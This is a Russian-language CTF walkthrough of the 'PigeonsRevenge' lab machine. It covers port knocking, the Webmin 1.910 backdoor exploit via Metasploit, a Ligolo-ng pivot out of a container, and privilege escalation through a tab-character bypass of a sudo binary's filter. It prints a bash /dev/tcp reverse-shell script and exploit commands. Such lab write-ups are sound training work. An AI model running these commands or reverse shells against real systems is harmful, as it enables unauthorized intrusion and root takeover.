Категория: Web/Linux/Forensics/PrivEsc Сложность: Medium/Hard (оценивается примерно в 70 голубей из 100)
Данный таск был частью 5 сезона CTF, который проходил на площадке ACLabs. Машина необычная с увлекательным сюжетом и интересными уязвимостями.
Условие задачи:
Борис — старый почтовый голубь. Катя, его голубка, улетела к наглому Воробью. Три дня Борис пил дешёвое пойло и строчил план мести. Теперь этот план у тебя. Помоги Борису пробраться в цифровое гнездо Воробья, украсть его аккаунт и стать рутом. Следуй за пьяными записками — там всё сказано и даже больше. Внимание, стенд будет полностью готов только по истечении обратного времени отсчета, даже если адрес появился раньше!
Цепочка атаки
Атакующая цепочка «PigeonsRevenge» комбинирует одну реальную критическую CVE (Webmin 1.910 — CVE-2019-15107, 9.8 CRITICAL) с набором классических техник ATT&CK: активная разведка → port knocking → эксплуатация публичного приложения → Metasploit reverse-shell → туннелирование Ligolo-ng → инъекция через переменную окружения в кастомный бинарник → обход фильтра табуляцией → закрепление с root-привилегиями.
1. Recon (Разведка)
Получаем айпишник и сканируем порты:
sudo nmap -sC -sV -v 10.10.10.215...PORT STATE SERVICE VERSION80/tcp open http nginx|_http-title: \xD0\x91\xD0\xBE\xD1\x80\xD0\xB8\xD1\x81 \xD0\x93\xD0\xBE\xD0\xBB\xD1\x83\xD0\xB1\xD1\x8C \xE2\x80\x94 LiveJournal| http-methods: |_ Supported Methods: GET HEAD
Не густо, одинокий 80 порт, а значит вебчик. Пойдем туда.
На главной странице видео, а также есть вкладка “план мести”. Остальные вкладки неактивные и в исходном коде нет ничего интересного. Поскольку других открытых портов нет, а фаззинг в течение 5 минут ничего не дал, будем внимательно изучать “План мести”. Это и сказано в описании к заданию. В плане сказано про брутфорс паролей, скриптинг на питоне, а также про стук в дверь. Вероятно имеется ввиду техника port knocking. С ее помощью скорее всего откроется еще один, а может и не один порт, через который будет осуществляться дальнейшая атака. Пока непонятно, в какие порты нужно стучаться. Единственное, что можно скачать видео, которое есть на главной странице в формате .mp4. Если проверить его через exiftool можно увидеть подсказку в комментариях.
exiftool video.mp4...Description : Sparrow nest door code blyat' 2 8 10
Теперь можем действовать. Для порт нокинга можно использовать утилиту knock. Но можно воспользоваться и nmap’ом.
sudo nmap -Pn -p 2,8,10 10.10.10.215 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 06:11 -0400Nmap scan report for 10.10.10.215Host is up.PORT STATE SERVICE2/tcp filtered compressnet8/tcp filtered unknown10/tcp filtered unknownNmap done: 1 IP address (1 host up) scanned in 3.84 seconds
Стучимся 3 раза с флагом -Pn и при следующем скане находим новый порт.
sudo nmap -Pn -sV -v 10.10.10.215...PORT STATE SERVICE VERSION80/tcp open http nginx10000/tcp open http MiniServ 1.910 (Webmin httpd)
На порту 10000 вылезает Webmin. Это панель для управления веб-сервером, с целым набором функций. Я с ней знаком, стояла на одном vps и знаю, что по http к ней не попадешь…
Ссылка, которая есть, никуда конечно же не приведет, а если зайти по https:// то попадаем на страницу входа в панель Webmin.
2. Поиск уязвимостей
Я перебрал пароли, которые были в плане мести, но ни один из них не подошел. Поэтому стал искать уязвимости на версию webmin 1.910.
В метасплойте есть достаточно эксплойтов и если их перебрать, то в списке под номером 10 webmin_backdor не требует ни логина, ни пароля. Это как раз подходит. Здесь нужно выставить опции, одна из главных из-за которых может не отработать set ssl true.
msf exploit(linux/http/webmin_backdoor) > set rhosts 10.10.10.215rhosts => 10.10.10.215msf exploit(linux/http/webmin_backdoor) > set ssl true[!] Changing the SSL option's value may require changing RPORT!ssl => truemsf exploit(linux/http/webmin_backdoor) > set lhost tun0lhost => 10.20.10.3msf exploit(linux/http/webmin_backdoor) > set srvhost tun0srvhost => 10.20.10.3msf exploit(linux/http/webmin_backdoor) > run[*] Started reverse TCP handler on 10.20.10.3:4444 [*] Running automatic check ("set AutoCheck false" to disable)[+] The target is vulnerable.[*] Configuring Automatic (Unix In-Memory) target[*] Sending cmd/unix/reverse_perl command payload[*] Command shell session 1 opened (10.20.10.3:4444 -> 10.10.10.215:50008) at 2026-03-12 06:35:23 -0400iduid=0(root) gid=0(root) groups=0(root)
Есть, мы рут и читаем флаг, в этом задании их 3. Используя этот эксплойт, нельзя перемещаться, по каталогам, однако прочитать флаг можно.
cat /flag1flag_73b93510202e14edfc2d07087c2052d4
Несмотря на то, что мы рут, это только контейнер.
Побег из контейнера и второй флаг
Для начала узнаем свой ip.
ip a1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0 valid_lft forever preferred_lft forever
Исследуем папку рута и обнаружим, что имеется файл .bash_history.
cat /root/.bash_history^Ccat /flag1ifconfigip a/sbin/ip assh sparrow@172.18.0.1fuck yeah
Видим, что sparrow пытался подключится по ssh к хосту 172.18.0.1. Значит нам нужно сделать, так, чтобы он стал доступен с атакующей машины.
Для этой операции будем использовать Ligolo-ng. Передаем агента на атакуемую машину, у себя же запускаем прокси.
sudo ligolo-proxy -selfcert
В контейнере куда передали агента, запускаем:
./ligolo-ng_agent_0.8.3_linux_amd64 -ignore-cert -connect 10.20.10.4:11601
После запуска, на сервере должно появиться соединение.
ligolo-ng » INFO[0369] Agent joined. id=0242ac120002 name=root@c14c20cf8e71 remote="10.10.10.215:36806"ligolo-ng » session? Specify a session : 1 - root@c14c20cf8e71 - 10.10.10.215:36806 - 0242ac120002[Agent : root@c14c20cf8e71] » autoroute? Select routes to add: 172.18.0.2/16? Create a new interface or use an existing one? Create a new interface? Enter interface name (leave empty for random name): pigeonINFO[0527] Using custom interface name: pigeon INFO[0527] Interface pigeon configured (will be created on tunnel start) INFO[0527] Creating routes for pigeon... ? Start the tunnel? YesINFO[0532] Starting tunnel to root@c14c20cf8e71 (0242ac120002) [Agent : root@c14c20cf8e71] »
Здесь выбираем autoroute и имя интерфейса. Я создал новое с именем pigeon. Теперь пробуем подключится по ssh по адресу 172.18.0.1.
ssh sparrow@172.18.0.1The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.ED25519 key fingerprint is: SHA256:e6QWia8qlEW9TbVi7D8GW8DVSbMPS0haIYlhHcSgmiMThis host key is known by the following other names/addresses: ~/.ssh/known_hosts:16: [hashed name]Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '172.18.0.1' (ED25519) to the list of known hosts.sparrow@172.18.0.1's password:
Есть подключение и мы знаем логин воробья. Однако пароль пока неизвестен. Если вспомнить “план мести”, то там сказано, что можно брутить, потому что воробей ленивый и никогда их не меняет. Я попробовал по очереди 4 пароля, которые были даны в задании и подошел KatyaMyQueen.
sparrow@sparrow:~$ ls -latotal 24drwx------ 2 sparrow sparrow 4096 Feb 10 14:15 .drwxr-xr-x 3 root root 4096 Feb 10 12:49 ..lrwxrwxrwx 1 root root 9 Feb 10 14:11 .bash_history -> /dev/null-rw-r--r-- 1 sparrow sparrow 220 Feb 10 12:49 .bash_logout-rw-r--r-- 1 sparrow sparrow 3526 Feb 10 12:49 .bashrc-r--r----- 1 sparrow sparrow 38 Mar 12 12:17 flag2-rw-r--r-- 1 sparrow sparrow 807 Feb 10 12:49 .profilesparrow@sparrow:~$ cat flag2 flag_8c3f96a510d78385bd8b8223bdfc17d2
Второй флаг есть. Остался последний…
Повышаем привилегии и захватываем последний флаг
Обычно первая команда, которую я запускаю на захваченной машине это sudo -l.
sparrow@sparrow:/usr/bin$ sudo -lMatching Defaults entries for sparrow on sparrow: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_ptyUser sparrow may run the following commands on sparrow: (root) SETENV: NOPASSWD: /usr/bin/pigeon_root --crumbs /root/root
Итак, мы можем запустить какой-то кастомный скрипт от рута без пароля. Если попробовать запустить, получим некую подсказку.
sparrow@sparrow:/usr/bin$ sudo /usr/bin/pigeon_root --crumbs /root/rootNo seeds provided, only vodka. Nothing to do.
Ок. Пока непонятно, что именно делает этот скрипт, нужно его изучить. Просмотр через catбинарных файлов плохая идея, поэтому я скачал его на kali через scp и стал ковырять в программе ghidra…
Из исходника, есть понимание, что строка __s = getenv("PIGEON_SEEDS"); PIGEON_SEEDS, позволяет задать переменную.
if ((__s == (char *)0x0) || (*__s == '\0'))
Если переменная не задана или пустая, программа пишет:
"No seeds provided, only vodka. Nothing to do."
for (; *local_10 != '\0'; local_10 = local_10 + 1) { pcVar2 = strchr(";|&`$()<>!\\{}\' \'",(int)*local_10); if (pcVar2 != (char *)0x0) { *local_10 = '_'; }}
В этом цикле идет фильтрация многих специальных символов. Для каждого символа в строке программа проверяет, входит ли он в список запрещённых. Если входит, заменяет на _.
uVar1 = system(__command);
Здесь идет выполнение команды через shell. Нужно проверить как на практике работает этот бинарник.
sparrow@sparrow:/usr/bin$ export PIGEON_SEEDS="ls -la"sparrow@sparrow:/usr/bin$ ./pigeon_root Original input : ls -laAfter filter : ls_-laExecuting: sh -c "ls_-la"sh: 1: ls_-la: not foundsparrow@sparrow:/usr/bin$ export PIGEON_SEEDS="id"sparrow@sparrow:/usr/bin$ ./pigeon_root Original input : idAfter filter : idExecuting: sh -c "id"uid=1000(sparrow) gid=1000(sparrow) groups=1000(sparrow),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev)
В первом случае я задал ls -la в качестве переменной для PIGEON_SEEDS. Видно, что после ls появилось нижнее подчеркивание и команда не выполнилась корректно. Во втором случае я задал в качестве переменной команду id и она выполнилась успешно. По сути нам нужно выполнить команду cat root/root. Известно, что пробел заменится нижним подчеркиванием, поэтому нужно всего лишь обойти фильтрацию. Здесь есть 2 пути решения.
Просто чтение флага путем обхода фильтра
Можно применить табуляцию. Потому что tab считается whitespace-разделителем.
sudo PIGEON_SEEDS=$'cat\t/root/root' /usr/bin/pigeon_root --crumbs /root/rootOriginal input : cat /root/rootAfter filter : cat /root/rootExecuting: sh -c "cat /root/root"flag_670a6e9beba41ca37d61b295a5ae06c4
Этот метод сработает только в том случае, если вы точно знаете расположение и имя флага. Однако если флаг называется по другому или расположение его неизвестно, то такая манипуляция будет бесполезна.
Становимся полноценным рутом путем проброса реверс шелла
В данном методе мы напишем небольшой скрипт на баше с самым простым реверс-шеллом.
#!/bin/bashbash -i >& /dev/tcp/10.20.10.4/4444 0>&1
Название не имеет значение, главное его прочмодить. Далее запускаем слушатель, в моем случае это 4444 и выполняем команду.
sudo PIGEON_SEEDS='/tmp/script.sh' /usr/bin/pigeon_root --crumbs /root/root
И получаем рута.
nc -vlnp 4444listening on [any] 4444 ...connect to [10.20.10.4] from (UNKNOWN) [10.10.10.215] 60664root@sparrow:/tmp# ididuid=0(root) gid=0(root) groups=0(root)root@sparrow:/tmp# cat /root/rootcat /root/rootflag_670a6e9beba41ca37d61b295a5ae06c4
Оценка CVE по шкале CVSS 3.1
|
CVE |
Продукт / компонент |
Тип |
CVSS 3.x |
Критичность |
URL NVD |
|---|---|---|---|---|---|
|
CVE-2019-15107 |
Webmin ≤ 1.920 (1.910) |
OS Command Injection / бэкдор в |
9.8 |
CRITICAL |
Заключение
Вот такая получилась машинка. Это не самая сложная тачка, но однозначно не самая легкая.
Кстати, в пятницу 17 апреля в 19.00 (по МСК) открывается новый сезон CTF — S6! Поэтому всем, кому хочется поучаствовать и попробовать свои силы в этичном хакинге — welcome!
ссылка на оригинал статьи https://habr.com/ru/articles/1024360/